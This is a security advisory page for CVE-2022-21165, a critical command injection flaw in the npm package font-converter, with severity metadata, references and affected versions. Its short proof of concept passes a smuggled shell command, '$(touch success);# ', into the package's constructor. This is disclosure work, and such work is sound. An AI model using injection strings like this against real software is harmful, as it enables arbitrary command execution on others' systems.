Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1nMmMzLXZ3ZmYtbTN4cs4AAuhr
Font-Converter Vulnerable to Arbitrary Command Injection
Overview
font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF)
All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.
PoC
var PUT = require('font-converter');
var x = "$(touch success);# ";
try {
new PUT(x, x, x, x);
} catch (e) {
console.log(e);
}
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nMmMzLXZ3ZmYtbTN4cs4AAuhr
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: 26 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-g2c3-vwff-m3xr, CVE-2022-21165
References:
- https://nvd.nist.gov/vuln/detail/CVE-2022-21165
- https://security.snyk.io/vuln/SNYK-JS-FONTCONVERTER-2976194
- https://github.com/zgec/node-js-font-converter/blob/master/index.js#L12
- https://github.com/advisories/GHSA-g2c3-vwff-m3xr
Blast Radius: 0.0
Affected Packages
npm:font-converter
Dependent packages: 3Dependent repositories: 1
Downloads: 117 last month
Affected Version Ranges: <= 1.1.1
No known fixed version
All affected versions: 1.0.0, 1.1.0, 1.1.1